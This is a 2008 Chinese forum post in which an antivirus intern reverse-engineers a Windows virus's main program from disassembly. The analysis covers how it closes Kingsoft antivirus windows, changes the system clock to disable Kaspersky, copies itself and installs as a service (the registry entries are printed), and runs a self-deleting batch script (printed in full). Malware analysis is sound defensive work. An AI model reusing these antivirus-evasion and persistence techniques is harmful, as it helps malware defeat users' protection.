工作不好找啊!!!
我学的是导弹和卫星,但是就是没有兴趣,钻研计算机倒是很深。可惜至今没有什么成就。
终于在一家反病毒公司找到一个实习的机会,这几天在都在干活。
于是前几天,在pediy的bbs上download了一个病毒回去分析。
我在这里就只分析一个主程序,病毒释放的dll文件以后有时间就分析拉。其实今天我已经分析了一半了,但是公司已经下班了,我肚子也饿了。哈哈,抱歉!!!
/////主程序部分
首先跳VC++程序的初始化部分
00402BDE E8 30F0FFFF call 00401C13
跟踪这个CALL,来到真正入口点
00401C13 55 push ebp
00401C14 8BEC mov ebp, esp
00401C16 81EC E4040000 sub esp, 4E4
往下走,来到这里(可以进去看看,只是一个获取Windows当前版本的函数)
00401CEA E8 33050000 call 00402222 ; 没什么东西::获取当前Windows版本
跳过,继续往下走
00401D13 50 push eax
00401D14 E8 370D0000 call <jmp.&msvcrt._mbscpy>
00401D19 83C4 40 add esp, 40
00401D1C 68 00EC4000 push 0040EC00 ; ASCII "au"
00401D21 8D85 1CFDFFFF lea eax, dword ptr [ebp-2E4]
00401D27 50 push eax
00401D28 E8 290D0000 call <jmp.&msvcrt._mbscat>
00401D2D 8D85 1CFDFFFF lea eax, dword ptr [ebp-2E4]
00401D33 68 F8EB4000 push 0040EBF8 ; ASCII "to.e"
00401D38 50 push eax
00401D39 E8 180D0000 call <jmp.&msvcrt._mbscat>
00401D3E 8D85 1CFDFFFF lea eax, dword ptr [ebp-2E4]
00401D44 68 F4EB4000 push 0040EBF4 ; ASCII "xe"
00401D49 50 push eax
00401D4A E8 070D0000 call <jmp.&msvcrt._mbscat>
这里通过拼接方式获得字符串"auto.exe",(这个病毒有点奇怪,好多字符串都是通过拼接的方式得到的,难道作者是为了做免杀???但是这样太不节约代码了吧。)
接着往下走(在call前打住!!!否则你就跟不到线程函数了)
00401D57 50 push eax
00401D58 57 push edi
00401D59 57 push edi
00401D5A 68 A91B4000 push 00401BA9
00401D5F 57 push edi ; 创建线程,用来停止金山毒霸
00401D60 57 push edi
00401D61 FF15 B0C04100 call dword ptr [<&kernel32.Create>; kernel32.CreateThread
这个时候,看一下堆栈:
0012FA1C 00000000 |pSecurity = NULL
0012FA20 00000000 |StackSize = 0
0012FA24 00401BA9 |ThreadFunction = 复件_dum.00401BA9 //////写的很明白,这个就是线程函数入口地址
0012FA28 00000000 |pThreadParm = NULL
0012FA2C 00000000 |CreationFlags = 0
0012FA30 0012FF08 \pThreadId = 0012FF08
还等什么??!!赶紧在反汇编窗口按下CTRL+G输入这个地址吧,哈哈
来到这里,下断
00401BA9 53 push ebx
00401BAA 55 push ebp
00401BAB 56 push esi
在主线程中F8单步,没走几步,就在新建的线程入口处断下了
因为主线程中:
00401D6D 68 E8030000 push 3E8
00401D72 FFD6 call esi ; kernel32.Sleep ///看见了吧,睡觉了
下面我们开始跑子线程
00401BBB 53 push ebx
00401BBC 68 BC1A4000 push 00401ABC ; 枚举窗口
00401BC1 FF15 24C14100 call dword ptr [<&user32.EnumWind>; USER32.EnumWindows
00401BCF 68 B0EB4000 push 0040EBB0 ; 指向字符串"金山毒霸",不信你可以在数据窗口跟踪一下
00401BD4 68 98EB4000 push 0040EB98 ; ASCII "#32770"
00401BD9 53 push ebx ; 查找标题为"金山毒霸"的"#32770"类窗口
00401BDA 53 push ebx ; 注意USER32.FindWindowExA查找所有窗口,包括子窗口
00401BDB FFD6 call esi ; USER32.FindWindowExA
00401BE1 68 A8EB4000 push 0040EBA8 ; ASCII "是(&Y)"
00401BE6 68 A0EB4000 push 0040EBA0 ; ASCII "Button"
00401BEB 53 push ebx ; 查找所有标题为"(是&Y)"的窗口
00401BEC 50 push eax
00401BED FFD6 call esi ; USER32.FindWindowExA
00401BF2 6A 01 push 1
00401BF4 68 01020000 push 201
00401BF9 55 push ebp
00401BFA FFD7 call edi ; USER32.SendMessageA
00401BF2 6A 01 push 1 ; 干什么???哈哈当然是发送一个按下的消息啦!!!
00401BF4 68 01020000 push 201
00401BF9 55 push ebp
00401BFA FFD7 call edi ; USER32.SendMessageA
00401C0B FF15 78C04100 call dword ptr [<&kernel32.Sleep>>; kernel32.Sleep
00401C11 ^ EB A8 jmp short 00401BBB
以上一大片的代码的意思是这样的:
第一:该子线程是一个经常sleep的无穷循环(如果不sleep,你的电脑就得CPU100%啦!!!)
第二:在循环中,它不停查找标题为"金山毒霸"的窗口,如果存在则发送关闭消息,再发送消息按下"(是&Y)",结果你就不能用"金山毒霸"啦(就是这点小伎俩,呵呵)。
好了,到这里,这个线程分析完毕了。小功告成!!!
回到主线程(之前你应该在这里下个断点,免得跟丢了)
00401DAF 53 push ebx
00401DB0 50 push eax
00401DB1 E8 F6040000 call 004022AC /////这个什么函数,进去看看; 实际上返回字符串"AD09E3"
来到
004022AC 55 push ebp
004022AD 8BEC mov ebp, esp
004022AF 81EC 08010000 sub esp, 108
004022B5 53 push ebx
004022B6 56 push esi
004022B7 57 push edi
004022B8 E8 9FFFFFFF call 0040225C ; 这个函数里面没有什么东西
继续往下走,一路上不停的经过sleep和其他乱七八糟的东东,在你快要sleep的时候,来到
00402341 50 push eax ; "AD09E3"
00402342 FF75 08 push dword ptr [ebp+8]
00402345 E8 2A070000 call <jmp.&msvcrt.memcpy>
"AD09E3"是什么东西???就是病毒将要注册的一个服务。怎么知道的???哈哈,不要告诉我你没有开虚拟机。在虚拟机里面中一下毒,不就知道了嘛。(用regsnap软件对比一下更容易看出来了)
00401E20 50 push eax
00401E21 E8 86040000 call 004022AC ; 返回ASCII "555E9A24",显然即将释放555E9A24.dll
00401E91 68 04010000 push 104
00401E96 50 push eax
00401E97 6A 00 push 0 ; 获取自身可执行文件名称
00401E99 FF15 A8C04100 call dword ptr [<&kernel32.GetModuleFileNam>; kernel32.GetModuleFileNameA
00401E9F 85C0 test eax, eax
00401EA1 75 07 jnz short 00401EAA
00401EA3 8BC7 mov eax, edi
00401EA5 E9 73010000 jmp 0040201D
00401EAA 8D85 1CFDFFFF lea eax, dword ptr [ebp-2E4] ; 获取成功,跳到这里
00401EB0 50 push eax ; "auto.exe"
00401EB1 8D85 1CFCFFFF lea eax, dword ptr [ebp-3E4]
00401EB7 50 push eax ; "C:\Documents and Settings\CTS.AnCui\",D7,"烂",B8,"",B4,"件 dumped.exe"
00401EB8 E8 A50B0000 call <jmp.&msvcrt.strstr> ; 字符匹配
00401EBD 59 pop ecx
00401EBE 85C0 test eax, eax
00401EC0 59 pop ecx
00401EC1 74 4D je short 00401F10
00401EC3 8D85 1CFCFFFF lea eax, dword ptr [ebp-3E4] ; 如果自身可执行文件是auto.exe,执行下面代码
00401EC9 50 push eax
00401ECA E8 9F0B0000 call <jmp.&msvcrt.strlen>
00401ECF 83F8 02 cmp eax, 2
00401ED2 59 pop ecx
00401ED3 76 3B jbe short 00401F10
00401ED5 0FBE85 1CFCFFFF movsx eax, byte ptr [ebp-3E4]
00401EDC 50 push eax
00401EDD 8D85 1CFCFFFF lea eax, dword ptr [ebp-3E4]
00401EE3 68 DCEB4000 push 0040EBDC ; %c:\
00401EE8 50 push eax
00401EE9 897D FC mov dword ptr [ebp-4], edi
00401EEC E8 590B0000 call <jmp.&msvcrt.sprintf>
00401EF1 83C4 0C add esp, 0C
00401EF4 8D85 1CFCFFFF lea eax, dword ptr [ebp-3E4]
00401EFA 57 push edi
00401EFB 6A 00 push 0
00401EFD 50 push eax
00401EFE 68 CCEB4000 push 0040EBCC ; explorer.exe
00401F03 68 C4EB4000 push 0040EBC4 ; open
00401F08 6A 00 push 0 ; 这段代码比较有意思;但你双击驱动器盘符的时候,病毒执行自身的时候尽量伪装了一下自己,就是真的给你打开了你的驱动器;你很满意,但是实际上你被忽悠了!!!
00401F0A FF15 14C14100 call dword ptr [<&shell32.ShellExecuteA>] ; shell32.ShellExecuteA
00401F10 E8 EBF0FFFF call 00401000 ; 如果可执行文件不是auto.exe,跳到这里
走到这里停一下
00401F10 E8 EBF0FFFF call 00401000
进去,经过N多个call <jmp.&msvcrt.sprintf>
0040125A 8D85 28FFFFFF lea eax, dword ptr [ebp-D8]
00401260 56 push esi
00401261 50 push eax
00401262 E8 E3170000 call <jmp.&msvcrt.sprintf>
终于:
00401267 68 10EB4000 push 0040EB10 ; ASCII "avp.exe"
0040126C E8 1A130000 call 0040258B
看到 "avp.exe"了,兴奋吧!?真正的战场近了。什么???你没有感觉???该不会是你不知道avp.exe是什么吧???那你就白菜了。
进call吧,来到
0040258B 55 push ebp
0040258C 8BEC mov ebp, esp
0040258E 81EC 2C010000 sub esp, 12C
00402594 53 push ebx
00402595 56 push esi
00402596 57 push edi
00402597 33DB xor ebx, ebx
00402599 E8 84FCFFFF call 00402222 ; 这个call没什么东西
以下就是通过三个API函数枚举进程(看看究竟进程中有没有AVP.EXE)。具体怎么实现的,请看:
004025AE E8 95060000 call <jmp.&kernel32.CreateToolhelp32Snapshot>
004025BD E8 80060000 call <jmp.&kernel32.Process32First>
00402614 E8 23060000 call <jmp.&kernel32.Process32Next>
0040261E FF15 88C04100 call dword ptr [<&kernel32.CloseHandle>] ; kernel32.CloseHandle
流程和罗老大的《Windows环境下32位汇编语言程序设计》里面讲的一样!哈哈~~
之后,返回。来看看怎么处理存在的"avp.exe"的:
0040127E 8D45 F0 lea eax, dword ptr [ebp-10]
00401281 50 push eax
00401282 FF15 80C04100 call dword ptr [<&kernel32.GetSystemTime>] ; kernel32.GetSystemTime
00401288 66:817D F0 D507 cmp word ptr [ebp-10], 7D5
0040128E 76 10 jbe short 004012A0
00401290 8D45 F0 lea eax, dword ptr [ebp-10]
00401293 66:C745 F0 D507 mov word ptr [ebp-10], 7D5
00401299 50 push eax
0040129A FF15 7CC04100 call dword ptr [<&kernel32.SetSystemTime>] ; kernel32.SetSystemTime
004012A0 68 204E0000 push 4E20
004012A5 FF15 78C04100 call dword ptr [<&kernel32.Sleep>] ; kernel32.Sleep ////这个sleep时间真TM长,不好意思说脏话了,病毒作者的sleep真TM多!!
004012AB 6A 01 push 1
004012AD 58 pop eax
004012AE C9 leave
004012AF C3 retn
又是利用卡巴斯基的注册机制缺陷。怎么讲?很简单,假如你购买的卡巴斯基使用期限是2007年1月到2009年6月,病毒把系统时间改为2007年1月之前或是2009年6月之后,卡巴斯基的系统实时保护就被DIABLE了。也不知道卡巴斯基会不会修正这个缺陷。
接着运行
00401F3B 53 push ebx
00401F3C 50 push eax
00401F3D FF15 A0C04100 call dword ptr [<&kernel32.lstrcpy>] ; kernel32.lstrcpyA
到这里时,堆栈中
0012FA2C 0012FA40 |String1 = 0012FA40
0012FA30 0040E310 \String2 = "3FD1E80C.EXE"
病毒开始拷贝自身了哦
继续往下
00401F49 57 push edi
00401F4A 50 push eax ; ASCII "3FD1E80C.EXE"
00401F4B E8 20010000 call 00402070
进去!看病毒是如何分身的:
004020AC 57 push edi
004020AD 50 push eax
004020AE FF15 A4C04100 call dword ptr [<&kernel32.GetSystemDirectoryA>] ; kernel32.GetSystemDirectoryA
找一找系统目录,这个嘛,还是必需的
004020FC 57 push edi
004020FD 50 push eax
004020FE 6A 00 push 0
00402100 FF15 A8C04100 call dword ptr [<&kernel32.GetModuleF>; kernel32.GetModuleFileNameA
00402106 85C0 test eax, eax
00402108 ^ 74 AE je short 004020B8
0040210A 8B35 34C14100 mov esi, dword ptr [<&user32.CharUpp>; USER32.CharUpperA
00402110 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00402116 50 push eax
00402117 FFD6 call esi
00402119 50 push eax
0040211A 8D85 F0FDFFFF lea eax, dword ptr [ebp-210]
00402120 50 push eax ; "C:\WINDOWS\SYSTEM32\3FD1E80C.EXE"
00402121 FFD6 call esi
00402123 50 push eax ; "C:\DOCUMENTS AND SETTINGS\CTS.ANCUI\",D7,"烂",B8,"",B4,"件 DUMPED.EXE"
00402124 E8 39090000 call <jmp.&msvcrt.strstr> ; 匹配文件名
00402129 59 pop ecx
0040212A 85C0 test eax, eax
0040212C 59 pop ecx
0040212D 74 04 je short 00402133
0040212F 33C0 xor eax, eax
00402131 EB 1A jmp short 0040214D ; 如果当前文件是"C:\WINDOWS\SYSTEM32\3FD1E80C.EXE",跳走
00402133 8D85 F8FEFFFF lea eax, dword ptr [ebp-108] ; 如果当前文件不是"C:\WINDOWS\SYSTEM32\3FD1E80C.EXE",跳到这里执行
00402139 50 push eax
0040213A 8D85 F0FDFFFF lea eax, dword ptr [ebp-210]
00402140 50 push eax ; ASCII "C:\WINDOWS\SYSTEM32\3FD1E80C.EXE"
00402141 E8 DEFEFFFF call 00402024 ; 复制自身到%SYSTEM32%\3FD1E80C.EXE,分身部分
00402146 F7D8 neg eax
分身,进去
00402024 55 push ebp
00402025 8BEC mov ebp, esp
00402027 83EC 20 sub esp, 20
0040202A 6A 1E push 1E
0040202C 8D45 E0 lea eax, dword ptr [ebp-20]
0040202F 6A 00 push 0
00402031 50 push eax
00402032 E8 310A0000 call <jmp.&msvcrt.memset>
00402037 8B45 08 mov eax, dword ptr [ebp+8]
0040203A 8365 F6 00 and dword ptr [ebp-A], 0
0040203E 8365 E0 00 and dword ptr [ebp-20], 0
00402042 8365 FA 00 and dword ptr [ebp-6], 0
00402046 8945 E8 mov dword ptr [ebp-18], eax
00402049 8B45 0C mov eax, dword ptr [ebp+C]
0040204C 83C4 0C add esp, 0C
0040204F 8945 EC mov dword ptr [ebp-14], eax
00402052 8D45 E0 lea eax, dword ptr [ebp-20]
00402055 66:C745 F0 1000 mov word ptr [ebp-10], 10
0040205B 50 push eax
0040205C C745 E4 0200000>mov dword ptr [ebp-1C], 2
00402063 FF15 10C14100 call dword ptr [<&shell32.SHFileOperation>] ; shell32.SHFileOperationA
00402069 F7D8 neg eax
0040206B 1BC0 sbb eax, eax
0040206D 40 inc eax
0040206E C9 leave
0040206F C3 retn
关键就是SHFileOperation这个API是什么意思!!!想知道具体的,查手册吧!!!但是这里我猜就是一个拷贝自身到%SYSTEM32%\3FD1E80C.EXE的过程。
不信,可以看看堆栈中:
0012F7D8 0012F7DC
0012F7DC 00000000
翻一下内存0012F7DC:
0012F7DC 00 00 00 00 02 00 00 00 14 F8 12 00 1C F9 12 00 .......?.?.
两个地址0012f814和0012f91c
看看:
0012F814 43 3A 5C 44 4F 43 55 4D 45 4E 54 53 20 41 4>C:\DOCUMENTS AND
0012F824 20 53 45 54 54 49 4E 47 53 5C 43 54 53 2E 4> SETTINGS\CTS.AN
0012F834 43 55 49 5C D7 C0 C3 E6 5C B8 B4 BC FE 20 4>CUI\桌面\复件 DU
0012F844 4D 50 45 44 2E 45 58 45 00 00 00 00 00 00 0>MPED.EXE........
0012F854 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0>................
0012F864 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0>................
0012F874 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0>................
0012F884 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0>................
0012F894 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0>................
0012F8A4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0>................
0012F8B4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0>................
0012F8C4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0>................
0012F8D4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0>................
0012F8E4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0>................
0012F8F4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0>................
0012F904 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0>................
0012F914 00 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 4>........C:\WINDO
0012F924 57 53 5C 53 59 53 54 45 4D 33 32 5C 33 46 4>WS\SYSTEM32\3FD1
0012F934 45 38 30 43 2E 45 58 45 00 00 00 00 00 00 0>E80C.EXE........
0012F944 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0>................
一直跑到
00401FD3 68 BCEB4000 push 0040EBBC ; -k
00401FD8 50 push eax ; "C:\WINDOWS\system32\3FD1E80C.EXE"
00401FD9 FF15 9CC04100 call dword ptr [<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401FDF 57 push edi
00401FE0 68 B80B0000 push 0BB8
00401FE5 8D85 1CFBFFFF lea eax, dword ptr [ebp-4E4]
00401FEB 68 50ED4000 push 0040ED50 ; ASCII "555E9A24"
00401FF0 50 push eax ; ASCII "C:\WINDOWS\system32\3FD1E80C.EXE -k"
00401FF1 BB 10E64000 mov ebx, 0040E610 ; ASCII "AD09E3"
00401FF6 68 10E54000 push 0040E510 ; ASCII "AD09E3"
00401FFB 53 push ebx
00401FFC E8 9B030000 call 0040239C
病毒开始修改注册表和添加服务了:
进去???肯定要进去的,但是我懒得讲了,因为一进去满眼都是注册表操作和服务操作。经过这一顿操作,你的注册表中多出:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AD09E3]
"Type"=dword:00000010
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"="C:\\WINDOWS\\system32\\3FD1E80C.EXE -k"
"DisplayName"="AD09E3"
"ObjectName"="LocalSystem"
"Description"="555E9A24"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AD09E3\Security]
"Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\
00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\
00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\
05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\
00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\
00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AD09E3\Enum]
"0"="Root\\LEGACY_AD09E3\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001
下面继续:
00402001 53 push ebx
00402002 E8 4E030000 call 00402355 ; 开启服务
进去:
00402355 56 push esi
00402356 57 push edi
00402357 68 3F000F00 push 0F003F
0040235C 6A 00 push 0
0040235E 6A 00 push 0
00402360 FF15 30C04100 call dword ptr [<&advapi32.OpenSCManagerA>] ; advapi32.OpenSCManagerA
00402366 8BF8 mov edi, eax
00402368 85FF test edi, edi
0040236A 74 2D je short 00402399
0040236C 68 FF010F00 push 0F01FF
00402371 FF7424 10 push dword ptr [esp+10]
00402375 57 push edi
00402376 FF15 20C04100 call dword ptr [<&advapi32.OpenServiceA>] ; advapi32.OpenServiceA
0040237C 8BF0 mov esi, eax
0040237E 85F6 test esi, esi
00402380 74 17 je short 00402399
00402382 6A 00 push 0
00402384 6A 00 push 0
00402386 56 push esi
00402387 FF15 1CC04100 call dword ptr [<&advapi32.StartServiceA>] ; advapi32.StartServiceA
0040238D 56 push esi
0040238E 8B35 28C04100 mov esi, dword ptr [<&advapi32.CloseServic>; advapi32.CloseServiceHandle
00402394 FFD6 call esi
00402396 57 push edi
00402397 FFD6 call esi
00402399 5F pop edi
0040239A 5E pop esi
0040239B C3 retn
所有都比较好理解。反正就是开启一个服务。这个服务就是病毒运行%system32%\3FD1E80C.EXE,也就是自身的复制品。这个复制品会释放并装载%sysytem32%\555E9A24.DLL,至于这个dll如何破坏你的系统,一言难尽。
下面到删除文件了自身了:
00402010 E8 9BF2FFFF call 004012B0
进去:
004012B0 55 push ebp
004012B1 8BEC mov ebp, esp
004012B3 81EC 08040000 sub esp, 408
004012B9 8D85 F8FCFFFF lea eax, dword ptr [ebp-308]
004012BF 68 FF000000 push 0FF
004012C4 50 push eax
004012C5 6A 00 push 0 ; 获取当前文件名称
004012C7 FF15 A8C04100 call dword ptr [<&kernel32.GetModuleFileNam>; kernel32.GetModuleFileNameA
004012CD 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
004012D3 68 FE000000 push 0FE
004012D8 50 push eax ; 获取系统目录
004012D9 FF15 A4C04100 call dword ptr [<&kernel32.GetSystemDirecto>; kernel32.GetSystemDirectoryA
0040131A 68 6CEB4000 push 0040EB6C ; ASCII "del.bat"
0040131F 50 push eax
00401320 FF15 9CC04100 call dword ptr [<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401326 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
0040132C 68 10E34000 push 0040E310 ; ASCII "3FD1E80C.EXE"
00401331 50 push eax
留心这些带有关键字句的地方。
00401378 50 push eax
00401379 50 push eax
0040137A 6A 02 push 2
0040137C 50 push eax
0040137D 50 push eax
0040137E 8D85 F8FBFFFF lea eax, dword ptr [ebp-408]
00401384 68 00000040 push 40000000
00401389 50 push eax
0040138A FF15 94C04100 call dword ptr [<&kernel32.CreateFileA>] ; kernel32.CreateFileA
这个时候堆栈中:
0012F5FC 0012F624 |FileName = "C:\WINDOWS\system32\del.bat"
0012F600 40000000 |Access = GENERIC_WRITE
0012F604 00000000 |ShareMode = 0
0012F608 00000000 |pSecurity = NULL
0012F60C 00000002 |Mode = CREATE_ALWAYS
0012F610 00000000 |Attributes = 0
0012F614 00000000 \hTemplateFile = NULL
继续往下走:(经过大量的对"C:\WINDOWS\system32\del.bat"的文件写操作)
0040155E 6A 01 push 1
00401560 5F pop edi
00401561 FF75 FC push dword ptr [ebp-4]
00401564 FF15 88C04100 call dword ptr [<&kernel32.CloseHandle>] ; kernel32.CloseHandle
这个时候:%system32%\del.bat之中的内容是:
@echo off
:selfkill
del /F /Q "C:\DOCUMENTS AND SETTINGS\CTS.ANCUI\桌面\复件 DUMPED.EXE"
if exist "C:\DOCUMENTS AND SETTINGS\CTS.ANCUI\桌面\复件 DUMPED.EXE" goto selfkill
del %0
说白了就是删除自身。
紧接着,执行这个del.bat:
0040156A 8D85 F8FBFFFF lea eax, dword ptr [ebp-408]
00401570 6A 00 push 0
00401572 50 push eax
00401573 FF15 84C04100 call dword ptr [<&kernel32.WinExec>] ; kernel32.WinExec
经过一系列的sleep和ret后,程序结束。
这个病毒会使得金山毒霸和卡巴斯基失效,注册自身的复制品为系统服务程序,在它释放并装在的dll中甚至有远程线程线程注入的代码。时间不够没有分析完。
作者的确是够老手,壳是未知的,为了躲避查杀代码乱的一团糟。
http://bbs.pediy.com/attachment.php?attachmentid=11006&stc=1&d=1199705684
谢谢观摩!!!
祝各位一切顺利!!!
- 标 题:前面版面上的一位仁兄贴的一个病毒,试着分析一下,呈现给大家(第一部分),(第二部分在15楼)
- 作 者:安摧
- 时 间:2008-01-07 19:43
- 链 接:http://bbs.pediy.com/showthread.php?t=57868